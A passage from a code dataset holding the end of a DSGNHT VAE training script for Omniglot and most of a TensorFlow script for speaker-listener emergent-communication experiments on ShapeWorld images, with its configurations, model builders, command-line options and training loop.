latent_units[0]\n p_layers.append(\n VAE(n_X=n_X, n_Y=n_Y, det_units=hidden_units_p[0], data_type=\"binary\", bias=None))\n p_layers.append(StandardVAETop(n_X=n_Y))\n q_layers.append(\n VAE(n_X=n_Y, n_Y=n_X, det_units=hidden_units_q[0], data_type=\"continuous\", bias=None))\n model = VAEDGMLayerStack(\n p_layers=p_layers,\n q_layers=q_layers,\n )\n model.setup()\n elif args.layers == 2:\n latent_units = [100, 50]\n hidden_units_p = [[200, 200], [100, 100]]\n hidden_units_q = [[100, 100], [200, 200]]\n\n n_Y = latent_units[0]\n p_layers.append(\n VAE(n_X=n_X, n_Y=latent_units[0], det_units=hidden_units_p[0], data_type=\"binary\", bias=None))\n q_layers.append(\n VAE(n_X=latent_units[0], n_Y=n_X, det_units=hidden_units_q[1], data_type=\"continuous\", bias=None))\n p_layers.append(\n VAE(n_X=latent_units[0], n_Y=latent_units[1], det_units=hidden_units_p[1], data_type=\"continuous\", bias=None))\n q_layers.append(\n VAE(n_X=latent_units[1], n_Y=latent_units[0], det_units=hidden_units_q[0], data_type=\"continuous\", bias=None))\n\n p_layers.append(StandardVAETop(n_X=latent_units[1]))\n model = VAEDGMLayerStack(\n p_layers=p_layers,\n q_layers=q_layers,\n )\n model.setup()\n\n assert model is not None\n\n # parameters\n def param_tag(value):\n \"\"\" Convert a float into a short tag-usable string representation. E.g.:\n 0.1 -> 11\n 0.01 -> 12\n 0.001 -> 13\n 0.005 -> 53\n \"\"\"\n if value == 0.0:\n return \"00\"\n exp = np.floor(np.log10(value))\n leading = (\"%e\"%value)[0]\n return \"%s%d\" % (leading, -exp)\n\n # Learning rate\n lr_p = args.lr_p\n tags += [\"lp\"+param_tag(lr_p)]\n lr_q = args.lr_q\n tags += [\"lq\"+param_tag(lr_q)]\n\n # LR decay\n if args.lrdecay != 1.0:\n tags += [\"lrdecay\"+param_tag(args.lrdecay-1.)]\n\n # Samples\n n_samples = args.samples\n tags += [\"spl%d\"%n_samples]\n\n # Batch size\n batch_size = args.batchsize\n tags += [\"bs%d\"%batch_size]\n\n # n_steps_simu\n n_steps_simu = args.n_simu\n tags += [\"ns%d\"%n_steps_simu]\n\n # n_steps_optm\n n_steps_optm = args.n_optm\n tags += [\"no%d\"%n_steps_optm]\n\n # momentum_decay\n momentum_decay = args.momentum_decay\n tags += [\"md\"+param_tag(momentum_decay)]\n\n # Dataset\n if args.shuffle:\n np.random.seed(23)\n preproc = [PermuteColumns()]\n tags += [\"shuffle\"]\n else:\n preproc = []\n\n binarize_preproc = preproc + [Binarize(late=True)]\n dataset = Omniglot(which_set='train', preproc=binarize_preproc)\n valiset = Omniglot(which_set='valid', preproc=binarize_preproc)\n testset = Omniglot(which_set='test', preproc=binarize_preproc)\n\n # lookahead\n lookahead = args.lookahead\n tags += [\"lah%d\" % lookahead]\n\n tags.sort()\n expname = \"dsgnht-%s-%slayer\"% (\"-\".join(tags), str(args.layers))\n\n if args.report:\n expname = \"report/\" + expname\n\n logger.info(\"Running %s\" % expname)\n\n\n#-----------------------------------------------------------------------------\n\n dlog_model_params_monitor = DLogModelParams()\n generate_data_monitor = SampleFromP(n_samples=100)\n\n trainer = DSGNHTTrainer(\n batch_size=batch_size,\n n_samples=n_samples,\n n_steps_simu=n_steps_simu,\n n_steps_optm=n_steps_optm,\n learning_rate_p=lr_p,\n learning_rate_q=lr_q,\n lr_decay=args.lrdecay,\n momentum_decay=momentum_decay,\n dataset=dataset,\n model=model,\n termination=EarlyStopping(lookahead=lookahead, min_epochs=10, max_epochs=999999),\n epoch_monitors=[\n dlog_model_params_monitor,\n generate_data_monitor,\n MonitorLL(name=\"valiset\", data=valiset, n_samples=n_samples_epoch),\n ],\n final_monitors=[\n dlog_model_params_monitor,\n generate_data_monitor,\n MonitorLL(name=\"final-testset\", data=testset, n_samples=n_samples_final,\n level=logging.CRITICAL),\n ],\n posterior_mean_samples=postsamples,\n posterior_mean_monitor=MonitorPosteriorMean(),\n )\n\n experiment = Experiment()\n experiment.set_trainer(trainer)\n experiment.setup_output_dir(expname)\n experiment.setup_logging()\n experiment.print_summary()\n\n if args.cont is None:\n logger.info(\"Starting experiment ...\")\n experiment.run_experiment()\n else:\n logger.info(\"Continuing experiment %s ....\" % args.cont)\n experiment.continue_experiment(args.cont+\"/results.h5\", row=-1)\n\n logger.info(\"Finished. Wrinting metadata\")\n\n experiment.print_summary()\n\n#=============================================================================\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--report', default=False, action=\"store_true\",\n help=\"Store results in report folder. (default: False)\")\n\n parser.add_argument('--shuffle', default=False, action='store_true',\n help=\"Shuffle the data. (default: False)\")\n\n parser.add_argument('--cont', nargs='?', default=None,\n help=\"Continue a previous in result_dir\")\n\n parser.add_argument('--gpu', default=0, type=int,\n help=\"ID of gpu device to use. (default: 0)\")\n\n parser.add_argument('--samples', default=5, type=int,\n help=\"Number of training samples. (default: 5)\")\n\n parser.add_argument('--batchsize', default=100, type=int,\n help=\"Mini batch size. (default: 100)\")\n\n parser.add_argument('--n_simu', default=10, type=int,\n help=\"No. steps used during simulating the dynamics. (default: 10)\")\n\n parser.add_argument('--n_optm', default=1, type=int,\n help=\"No. steps used during optimizing the recognition model. (default: 1)\")\n\n parser.add_argument('--lr_p', default=0.002, type=float,\n help=\"Per-batch learning rate of DSGNHT. (default: 0.002)\")\n\n parser.add_argument('--lr_q', default=0.0001, type=float,\n help=\"Step size of Adam. (default: 0.0001)\")\n\n parser.add_argument('--lrdecay', default=1., type=float,\n help=\"Learning rate decay. (default: 1.0)\")\n\n parser.add_argument('--momentum_decay', default=0.1, type=float,\n help=\"Momentum decay of DSGNHT. (default: 0.1)\")\n\n parser.add_argument('--lookahead', default=20, type=int,\n help=\"Termination criteria: # epochs without LL increase. (default: 20)\")\n\n parser.add_argument('--postsamples', default=\"1,5,10,20,50,100,200\", type=str,\n help=\"# samples for computing posterior mean. (default: 1,5,10,20,50,100,200)\")\n\n parser.add_argument('--layers', default=1, type=int,\n help=\"# of stochastic layers. (default: 1)\")\n\n args = parser.parse_args()\n\n FORMAT = '[%(asctime)s] %(name)-15s %(message)s'\n DATEFMT = '%H:%M:%S'\n LEVEL_STYLES = dict(\n debug=dict(color='green'),\n info=dict(),\n verbose=dict(color='blue'),\n warning=dict(color='yellow'),\n error=dict(color='red'),\n critical=dict(color='magenta'))\n\n coloredlogs.install(level='INFO',fmt=FORMAT, datefmt=DATEFMT, level_styles=LEVEL_STYLES)\n\n run_experiment(args)\n\n","sub_path":"omniglot-vae/run-dsgnht-omniglot-vae.py","file_name":"run-dsgnht-omniglot-vae.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164610342","text":"\"\"\"\nRun rnn-syn experiments.\n\nTODO: Maybe variation in number of images is a big confounding factor in\nmessages...could just keep that constant!\n\"\"\"\n\nimport net\nimport tensorflow as tf\nimport numpy as np\nimport swdata\nfrom swdata import (AsymScene, Scene, SWorld, TrainEx, load_components,\n make_from_components)\nimport sys\nimport os\nfrom tensorflow.python import debug as tf_debug\nimport pandas as pd\nimport itertools\nimport gc\nfrom scipy.misc import imsave\n\nRNN_CELLS = {\n 'gru': tf.contrib.rnn.GRUCell,\n 'lstm': tf.contrib.rnn.LSTMCell,\n}\n\nassert AsymScene\nassert Scene\nassert SWorld\nassert TrainEx\n\n\ndef add_weights(configs, w=10):\n \"\"\"Add weight to config if colors are same\"\"\"\n # Add weights to configs. Specifically make 10x as likely\n return [\n (c, w if c[0][1] == c[1][1] else 1) for c in configs\n ]\n\n\ndef mkconfig(a, b, n=1000):\n # Just sorts them in order so we can reliably identify the config.\n return '{}-{}-{}'.format(n, *sorted([a, b]))\n\n\ndef mkconfigs(arr, n=1000):\n return [mkconfig(a, b, n=n) for a, b in itertools.combinations(arr, 2)]\n\n\nCONFIGS = {\n # Generalization to new color/shape pair (triangle + red)\n # After seeing 2 colors and shapes\n 'shape_color_generalization_1': {\n 'train': [\n mkconfig('square-blue', 'square-red'),\n mkconfig('square-blue', 'triangle-blue'),\n mkconfig('square-red', 'triangle-blue')\n ],\n 'test': [\n mkconfig('square-blue', 'triangle-red'),\n mkconfig('square-red', 'triangle-red'),\n mkconfig('triangle-blue', 'triangle-red')\n ]\n },\n # Generalization to new color/shape pair\n # After seeing 3 colors and 2 shapes\n 'shape_color_generalization_2': {\n 'train':\n mkconfigs([\n 'square-blue', 'square-red', 'triangle-blue', 'square-green',\n 'triangle-green'\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-blue', 'square-red', 'triangle-blue', 'square-green',\n 'triangle-green'\n ]\n ]\n },\n # After seeing 3 colors and 3 shapes, importantly: trained on red\n 'shape_color_generalization_3': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green'\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green'\n ]\n ]\n },\n 'shape_color_generalization_4': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green',\n 'cross-red', 'cross-blue', 'cross-green',\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green',\n 'cross-red', 'cross-blue', 'cross-green',\n ]\n ]\n },\n 'colors_only': {\n 'train': [mkconfig('{}-{}'.format(s1, color), '{}-{}'.format(s2, color))\n for color in swdata.COLORS\n for s1, s2 in itertools.combinations(['square', 'triangle', 'circle', 'cross'], 2)],\n 'test': [mkconfig('{}-{}'.format(s1, color), '{}-{}'.format(s2, color))\n for color in swdata.COLORS\n for s1, s2 in itertools.combinations(['square', 'triangle', 'circle', 'cross'], 2)],\n },\n 'shape_color_generalization_5': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'square-cyan', 'square-yellow', 'square-magenta',\n 'triangle-blue', 'triangle-green', # 'triangle-red',\n 'triangle-cyan', 'triangle-yellow', 'triangle-magenta',\n 'circle-red', 'circle-blue', 'circle-green',\n 'circle-cyan', 'circle-yellow', 'circle-magenta',\n 'cross-red', 'cross-blue', 'cross-green',\n 'cross-cyan', 'cross-yellow', 'cross-magenta',\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-red', 'square-blue', 'square-green',\n 'square-cyan', 'square-yellow', 'square-magenta',\n 'triangle-blue', 'triangle-green',\n 'triangle-cyan', 'triangle-yellow', 'triangle-magenta',\n 'circle-red', 'circle-blue', 'circle-green',\n 'circle-cyan', 'circle-yellow', 'circle-magenta',\n 'cross-red', 'cross-blue', 'cross-green',\n 'cross-cyan', 'cross-yellow', 'cross-magenta',\n ]\n ]\n },\n 'standard': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'square-cyan', 'square-yellow', 'square-magenta',\n 'triangle-blue', 'triangle-green', 'triangle-red',\n 'triangle-cyan', 'triangle-yellow', 'triangle-magenta',\n 'circle-red', 'circle-blue', 'circle-green',\n 'circle-cyan', 'circle-yellow', 'circle-magenta',\n 'cross-red', 'cross-blue', 'cross-green',\n 'cross-cyan', 'cross-yellow', 'cross-magenta',\n ]),\n },\n # Generalization to new pair (does it with 100% accuracy, meaning messages encode target/referent\n 'new_pair_generalization_1': {\n 'train': [\n mkconfig('square-blue', 'square-red'),\n mkconfig('square-red', 'triangle-blue')\n ],\n 'test': [mkconfig('square-blue', 'triangle-blue')]\n }\n}\n\n\ndef find_true_example(envslabels):\n envs, labels = envslabels\n for env, label in zip(envs, labels):\n if label == 1.0:\n return env\n raise RuntimeError(\"Coudln't find a True label\")\n\n\ndef build_feature_model(n_images,\n max_shapes,\n n_attrs,\n net_arch=(256, 64),\n discrete=False,\n rnncell=tf.contrib.rnn.GRUCell,\n asym=False):\n \"\"\"\n Return an encoder-decoder model that uses the raw feature representation\n of ShapeWorld microworlds for communication. This is exactly the model used\n in Andreas and Klein (2017).\n \"\"\"\n n_hidden, n_comm = net_arch\n\n # Each image represented as a max_shapes * n_attrs array\n n_image_features = max_shapes * n_attrs\n t_features = tf.placeholder(tf.float32, (None, n_images, n_image_features))\n\n # Whether an image is the target\n t_labels = tf.placeholder(tf.float32, (None, n_images))\n\n if asym:\n # Listener sees separate labels and features\n t_features_l = tf.placeholder(tf.float32,\n (None, n_images, n_image_features))\n t_labels_l = tf.placeholder(tf.float32, (None, n_images))\n\n # Encoder observes both object features and target labels\n t_labels_exp = tf.expand_dims(t_labels, axis=2)\n t_in = tf.concat((t_features, t_labels_exp), axis=2)\n\n if rnncell == tf.contrib.rnn.LSTMCell:\n cell = rnncell(n_hidden, state_is_tuple=False)\n else:\n cell = rnncell(n_hidden)\n with tf.variable_scope(\"enc1\"):\n states1, hidden1 = tf.nn.dynamic_rnn(cell, t_in, dtype=tf.float32)\n t_hidden = hidden1\n t_msg = tf.nn.relu(net.linear(t_hidden, n_comm, 'linear_speaker'))\n if discrete:\n t_msg_discrete = tf.one_hot(\n tf.argmax(t_msg, axis=1), depth=n_comm, name='discretize')\n\n # Decoder makes independent predictions for each set of object features\n t_expand_msg = tf.expand_dims(\n t_msg_discrete if discrete else t_msg, axis=1)\n t_tile_message = tf.tile(t_expand_msg, (1, n_images, 1))\n\n if asym: # Encode listener features\n t_out_feats = tf.concat((t_tile_message, t_features_l), axis=2)\n else:\n t_out_feats = tf.concat((t_tile_message, t_features), axis=2)\n\n t_pred = tf.squeeze(\n net.mlp(t_out_feats, (n_hidden, 1), (tf.nn.relu, None)))\n\n if asym: # Loss wrt listener labels\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels_l, logits=t_pred))\n return (t_features, t_labels, t_features_l, t_labels_l,\n (t_msg_discrete if discrete else t_msg), t_pred, t_loss)\n else:\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels, logits=t_pred))\n return (t_features, t_labels, (t_msg_discrete\n if discrete else t_msg), t_pred, t_loss)\n\n\ndef build_end2end_model(n_images,\n image_dim=(64, 64, 3),\n net_arch=(256, 64, 1024),\n discrete=False,\n rnncell=tf.contrib.rnn.GRUCell,\n asym=False):\n \"\"\"\n Return an encoder-decoder model that uses raw ShapeWorld images\n\n net_arch:\n (number of GRU hidden units, message dimensionality,\n convnet toplevel layer dimensionality)\n\n discrete:\n Discretize by one-hot encoding the message. Then message\n dimensionality arg of net_arch encodes vocabulary size\n \"\"\"\n n_hidden, n_comm, n_toplevel_conv = net_arch\n\n # The raw image representation, of shape n_images * image_dim\n t_features_raw = tf.placeholder(\n tf.float32, (None, n_images) + image_dim, name='features_speaker')\n\n t_features_toplevel_enc = net.convolve(t_features_raw, n_images,\n n_toplevel_conv, 'conv_speaker')\n\n # Whether an image is the target\n t_labels = tf.placeholder(\n tf.float32, (None, n_images), name='labels_speaker')\n\n if asym:\n # Listener observes own features/labels\n t_features_raw_l = tf.placeholder(\n tf.float32, (None, n_images) + image_dim, name='features_listener')\n t_labels_l = tf.placeholder(\n tf.float32, (None, n_images), name='labels_listener')\n\n # Encoder observes both object features and target labels\n t_labels_exp = tf.expand_dims(t_labels, axis=2)\n t_in = tf.concat(\n (t_features_toplevel_enc, t_labels_exp), axis=2, name='input_speaker')\n\n if rnncell == tf.contrib.rnn.LSTMCell:\n cell = rnncell(n_hidden, state_is_tuple=False)\n else:\n cell = rnncell(n_hidden)\n with tf.variable_scope(\"enc1\"):\n states1, hidden1 = tf.nn.dynamic_rnn(cell, t_in, dtype=tf.float32)\n t_hidden = hidden1\n t_msg = tf.nn.relu(\n net.linear(t_hidden, n_comm, 'linear_speaker'), name='message')\n\n if discrete:\n t_msg_discrete = tf.one_hot(\n tf.argmax(t_msg, axis=1), depth=n_comm, name='message_discrete')\n\n # Decoder makes independent predictions for each set of object features\n with tf.name_scope('message_process'):\n t_expand_msg = tf.expand_dims(\n t_msg_discrete if discrete else t_msg, axis=1)\n t_tile_message = tf.tile(t_expand_msg, (1, n_images, 1))\n\n if asym:\n t_features_toplevel_dec = net.convolve(\n t_features_raw_l, n_images, n_toplevel_conv, 'conv_listener')\n else:\n t_features_toplevel_dec = net.convolve(\n t_features_raw, n_images, n_toplevel_conv, 'conv_listener')\n t_out_feats = tf.concat(\n (t_tile_message, t_features_toplevel_dec),\n axis=2,\n name='input_listener')\n t_pred = tf.squeeze(\n net.mlp(t_out_feats, (n_hidden, 1), (tf.nn.relu, None)),\n name='prediction')\n if asym:\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels_l, logits=t_pred),\n name='loss')\n return (t_features_raw, t_labels, t_features_raw_l, t_labels_l,\n (t_msg_discrete if discrete else t_msg), t_pred, t_loss,\n t_features_toplevel_enc, t_features_toplevel_dec)\n else:\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels, logits=t_pred))\n return (t_features_raw, t_labels, (t_msg_discrete if discrete else\n t_msg), t_pred, t_loss,\n t_features_toplevel_enc, t_features_toplevel_dec)\n\n\ndef batches(train, batch_size, max_data=None):\n \"\"\"\n Yield batches from `train`. Discards smallest batch sizes, like\n tf.train.Batch.\n \"\"\"\n if max_data is not None:\n # Truncate list and yield normally\n yield from batches(train[:max_data], batch_size, max_data=None)\n else:\n for i in range(0, len(train), batch_size):\n batch = train[i:i + batch_size]\n if len(batch) == batch_size:\n yield batch\n\n\nif __name__ == \"__main__\":\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\n\n parser = ArgumentParser(\n description='rnn-syn', formatter_class=ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '--model',\n type=str,\n choices=['feature', 'end2end'],\n default='end2end',\n help='Model type')\n\n parser.add_argument(\n '--debug', action='store_true', help='Use tensorflow debugger')\n\n data_opts = parser.add_argument_group('data', 'options for data gen')\n data_opts.add_argument(\n '--data',\n type=str,\n help='Folder of dataset to load (cannot be used with --components)')\n data_opts.add_argument(\n '--components',\n action='store_true',\n help='Generate dataset from components instead (cannot be used with '\n '--data')\n\n component_args = parser.add_argument_group(\n 'components',\n 'options for generating data from cmponents (only supports asym now)')\n component_args.add_argument(\n '--train_components',\n nargs='+',\n default=CONFIGS['shape_color_generalization_5']['train'])\n component_args.add_argument(\n '--test_components',\n nargs='+',\n default=CONFIGS['shape_color_generalization_5']['test'])\n component_args.add_argument(\n '--n_dev', type=int, default=1024, help='Dev set size')\n component_args.add_argument(\n '--n_test',\n type=int,\n default=1024,\n help='Number of testing examples to create from components')\n\n component_args.add_argument(\n '--asym',\n action='store_true',\n help='Use asym worlds')\n component_args.add_argument(\n '--asym_max_images',\n default=5,\n type=int,\n help='Maximum images in each asymmetric world')\n component_args.add_argument(\n '--asym_min_targets',\n default=2,\n type=int,\n help='Minimum targets in each asymmetric world')\n component_args.add_argument(\n '--asym_min_distractors',\n default=1,\n type=int,\n help='Minimum distractors in each asymmetric world')\n\n net_opts = parser.add_argument_group('net', 'options for net architecture')\n net_opts.add_argument(\n '--n_hidden', type=int, default=256, help='GRUCell hidden layer size')\n net_opts.add_argument(\n '--n_comm', type=int, default=64, help='Communication layer size')\n net_opts.add_argument(\n '--n_conv', type=int, default=1024, help='top-layer convolution size (only for end2end)')\n net_opts.add_argument(\n '--comm_type',\n type=str,\n default='continuous',\n choices=['continuous', 'discrete'],\n help='Communication channel type')\n net_opts.add_argument(\n '--rnn_cell',\n type=str,\n default='gru',\n choices=['lstm', 'gru'],\n help='RNN Cell type')\n net_opts.add_argument(\n '--tensorboard',\n action='store_true',\n help='Save tensorboard graph, don\\'t do anything else')\n net_opts.add_argument(\n '--tensorboard_messages',\n action='store_true',\n help='Save test (or train if not --test) messages for '\n 'tensorboard embedding visualization')\n net_opts.add_argument(\n '--tensorboard_save',\n default='./saves/tensorboard/rnn-syn-graph',\n help='Tensorboard graph save dir')\n\n train_opts = parser.add_argument_group('train', 'options for net training')\n train_opts.add_argument(\n '--restore', action='store_true', help='Restore model')\n train_opts.add_argument(\n '--restore_path',\n type=str,\n default='saves/{data}-{model}-model.model',\n help='Restore filepath (can use parser options)')\n train_opts.add_argument(\n '--save', action='store_true', help='Save model file')\n train_opts.add_argument(\n '--save_path',\n type=str,\n default='saves/{data}-{model}-model.ckpt',\n help='Save model filepath (can use parser options)')\n train_opts.add_argument(\n '--seed',\n type=int,\n default=None,\n help='Random seed (if none, picked randomly)')\n train_opts.add_argument(\n '--tf_seed',\n type=int,\n default=None,\n help='Random TensorFlow seed (by default, same as args.seed)')\n train_opts.add_argument(\n '--batch_size', type=int, default=128, help='Batch size')\n train_opts.add_argument(\n '--epochs', type=int, default=16, help='Number of training epochs')\n train_opts.add_argument(\n '--max_data',\n type=int,\n default=None,\n help='Max size of training data (rest discarded)')\n train_opts.add_argument(\n '--dev_every',\n type=int,\n default=10,\n help='How often (in epochs) to report dev results. '\n 'Only applies to components (for now)')\n\n test_opts = parser.add_argument_group('train', 'options for net testing')\n test_opts.add_argument('--test', action='store_true', help='do testing')\n test_opts.add_argument(\n '--test_split',\n type=float,\n default=0.2,\n help='%% of dataset to test on')\n test_opts.add_argument(\n '--test_no_unique',\n action='store_true',\n help='Don\\'t require testing unique configs')\n\n save_opts = parser.add_argument_group('save messages')\n save_opts.add_argument(\n '--no_save_msgs',\n action='store_true',\n help='Don\\'t save comptued messages after testing')\n save_opts.add_argument(\n '--msgs_file',\n default='data/{data}-{model}-{comm_type}'\n '{n_comm}-{epochs}epochs-msgs.pkl',\n help='Save location (can use parser options)')\n save_opts.add_argument(\n '--save_max',\n type=int,\n default=None,\n help='Maximum number of messages to save')\n\n args = parser.parse_args()\n\n if args.components and args.data:\n parser.error(\"Can't specify --data and --components\")\n if not args.components and not args.data:\n parser.error(\"Must specify one of --data or --components\")\n\n if args.seed is not None:\n random = np.random.RandomState(args.seed)\n else:\n random = np.random.RandomState(args.seed)\n\n if args.tf_seed is not None:\n tf.set_random_seed(args.tf_seed)\n elif args.seed is not None:\n tf.set_random_seed(args.seed)\n\n if args.components:\n if any(x in args.train_components for x in args.test_components):\n print(\"Warning: test components in train components, could be\"\n \"repeats depending on size of data\")\n # Hardcoded asym\n asym = True\n actually_asym = args.asym\n if asym:\n print(\"Generating from components (asym)\")\n else:\n raise NotImplementedError\n print(\"Loading training components\")\n configs, components_dict = load_components(args.train_components)\n # configs = add_weights(configs)\n # Generate metadata ourself\n asym_args = {\n 'max_images': args.asym_max_images,\n 'min_targets': args.asym_min_targets,\n 'min_distractors': args.asym_min_distractors\n }\n train = make_from_components(\n args.batch_size,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args)\n # To satisfy later args\n metadata = {\n 'asym': True,\n 'asym_args': asym_args,\n }\n # Generate a dev set\n dev, dev_metadata = zip(*make_from_components(\n args.n_dev,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args))\n dev_envs = None # Flag to generate dev envs only once\n else:\n print(\"Loading data\")\n train, metadata = swdata.load_scenes(args.data, gz=True)\n\n asym = False\n if 'asym' in metadata and metadata['asym']:\n print(\"Asymmetric dataset detected\")\n asym = True\n\n # Train/test split\n if args.test:\n # Keep unique configs only\n if not args.test_no_unique:\n # TODO: Support different kinds of testing (e.g. left/right)\n unique_sets = []\n seen_configs = set()\n for config_data, config_md in zip(train, metadata['configs']):\n config_hashable = (tuple(config_md['distractor']),\n tuple(config_md['target']),\n config_md['relation'],\n config_md['relation_dir'])\n if config_hashable not in seen_configs:\n seen_configs.add(config_hashable)\n unique_sets.append((config_data, config_md))\n random.shuffle(unique_sets)\n train, test = swdata.train_test_split(\n unique_sets, test_split=args.test_split)\n train = swdata.flatten(train, with_metadata=True)\n test = swdata.flatten(test, with_metadata=True)\n random.shuffle(train)\n random.shuffle(test)\n else:\n train = list(zip(train, metadata['configs']))\n train, test = swdata.train_test_split(\n train, test_split=args.test_split)\n train = swdata.flatten(train, with_metadata=True)\n test = swdata.flatten(test, with_metadata=True)\n random.shuffle(train)\n random.shuffle(test)\n print(\"Train:\", len(train), \"Test:\", len(test))\n else:\n # Just train on everything.\n train = list(zip(train, metadata['configs']))\n train = swdata.flatten(train, with_metadata=True)\n random.shuffle(train)\n\n if asym:\n max_images = metadata['asym_args']['max_images']\n n_attrs = len(train[0].world.speaker_worlds[0].shapes[0])\n else:\n max_images = metadata['n_targets'] + metadata['n_distractors']\n n_attrs = len(train[0].world.worlds[0].shapes[0])\n\n # Hardcoded for now\n max_shapes = 2\n\n print(\"Building model\")\n if args.model == 'feature':\n if asym:\n tfs, tls, tfl, tll, t_msg, t_pred, t_loss = build_feature_model(\n max_images,\n max_shapes,\n n_attrs,\n net_arch=(args.n_hidden, args.n_comm),\n discrete=args.comm_type == 'discrete',\n asym=True)\n else:\n t_features, t_labels, t_msg, t_pred, t_loss = build_feature_model(\n max_images,\n max_shapes,\n n_attrs,\n net_arch=(args.n_hidden, args.n_comm),\n discrete=args.comm_type == 'discrete',\n asym=False)\n elif args.model == 'end2end':\n if asym:\n tfs, tls, tfl, tll, t_msg, t_pred, t_loss, convs, convl = build_end2end_model(\n max_images,\n net_arch=(args.n_hidden, args.n_comm, args.n_conv),\n discrete=args.comm_type == 'discrete',\n rnncell=RNN_CELLS[args.rnn_cell],\n asym=True)\n else:\n t_features, t_labels, t_msg, t_pred, t_loss, convs, convl = build_end2end_model(\n max_images,\n net_arch=(args.n_hidden, args.n_comm, args.n_conv),\n discrete=args.comm_type == 'discrete',\n rnncell=RNN_CELLS[args.rnn_cell],\n asym=False)\n else:\n raise RuntimeError(\"Unknown model type {}\".format(args.model))\n optimizer = tf.train.AdamOptimizer(0.001)\n o_train = optimizer.minimize(t_loss)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n session = tf.Session(config=config)\n if args.debug:\n session = tf_debug.LocalCLIDebugWrapperSession(\n session, dump_root='/local/scratch/jlm95/tfdbg/')\n session.run(tf.global_variables_initializer())\n\n if args.tensorboard:\n print(\"Saving logs to {}\".format(args.tensorboard_save))\n tf.summary.FileWriter(\n args.tensorboard_save, graph=tf.get_default_graph())\n print(\"Exiting\")\n sys.exit(0)\n\n # ==== TRAIN ====\n if args.restore:\n saver = tf.train.Saver()\n saver.restore(session, args.restore_path.format(**vars(args)))\n else:\n acc_history = []\n loss_history = []\n\n print(\"Training\")\n for epoch in range(args.epochs):\n if args.components:\n if epoch != 0:\n # Sample new components\n train = make_from_components(\n args.batch_size,\n configs,\n components_dict,\n asym=actually_asym,\n asym_args=asym_args)\n else:\n # Shuffle training data, since epoch is complete\n random.shuffle(train)\n loss = 0\n hits = 0\n total = 0\n if args.components:\n batch_iter = [train]\n else:\n batch_iter = batches(\n train, args.batch_size, max_data=args.max_data)\n for batch in batch_iter:\n batch, batch_metadata = zip(*batch)\n if args.model == 'feature':\n if asym:\n # Since we need to measure accuracy stats on listener\n # labels, keep name for those\n se, sl, envs, labels = swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=True)\n else:\n envs, labels = swdata.extract_envs_and_labels(\n batch, max_images, max_shapes, n_attrs, asym=False)\n elif args.model == 'end2end':\n if asym:\n se, sl, envs, labels = swdata.prepare_end2end(\n batch, max_images, asym=True)\n else:\n envs, labels = swdata.prepare_end2end(\n batch, max_images, asym=False)\n else:\n raise RuntimeError\n if asym:\n l, preds, _ = session.run([t_loss, t_pred, o_train], {\n tfs: se,\n tls: sl,\n tfl: envs,\n tll: labels\n })\n else:\n l, preds, _ = session.run([t_loss, t_pred, o_train], {\n t_features: envs,\n t_labels: labels\n })\n\n match = (preds > 0) == labels\n loss += l\n hits += np.all(match, axis=1).sum()\n total += len(match)\n\n if args.components and (epoch % args.dev_every == 0):\n # Every 10 epochs, print dev accuracy\n if dev_envs is None:\n if args.model == 'feature':\n if asym:\n # Since we need to measure accuracy stats on listener\n # labels, keep name for those\n dev_se, dev_sl, dev_envs, dev_labels = swdata.extract_envs_and_labels(\n dev, max_images, max_shapes, n_attrs, asym=True)\n else:\n dev_envs, dev_labels = swdata.extract_envs_and_labels(\n dev, max_images, max_shapes, n_attrs, asym=False)\n elif args.model == 'end2end':\n if asym:\n dev_se, dev_sl, dev_envs, dev_labels = swdata.prepare_end2end(\n dev, max_images, asym=True)\n else:\n dev_envs, dev_labels = swdata.prepare_end2end(\n dev, max_images, asym=False)\n else:\n raise RuntimeError\n if asym:\n dev_l, dev_preds, dev_msgs, dev_convs, dev_convl = session.run(\n [t_loss, t_pred, t_msg, convs, convl], {\n tfs: dev_se,\n tls: dev_sl,\n tfl: dev_envs,\n tll: dev_labels\n })\n else:\n dev_l, dev_preds, dev_msgs, dev_convs, dev_convl = session.run(\n [t_loss, t_pred, t_msg, convs, convl], {\n t_features: dev_envs,\n t_labels: dev_labels\n })\n\n dev_match = (dev_preds > 0) == dev_labels\n assert len(dev_match) == args.n_dev\n dev_hits = np.all(dev_match, axis=1).sum()\n dev_acc = dev_hits / args.n_dev\n print(\"Epoch {}: Dev accuracy {}, Loss {}\".format(\n epoch, dev_acc, dev_l))\n elif not args.components:\n acc = hits / total\n print(\"Epoch {}: Accuracy {}, Loss {}\".format(\n epoch, acc, loss))\n\n loss_history.append(loss)\n acc_history.append(acc)\n\n if args.save:\n saver = tf.train.Saver()\n saver.save(session, args.save_path.format(**vars(args)))\n\n # ==== TEST ====\n if args.components:\n if not 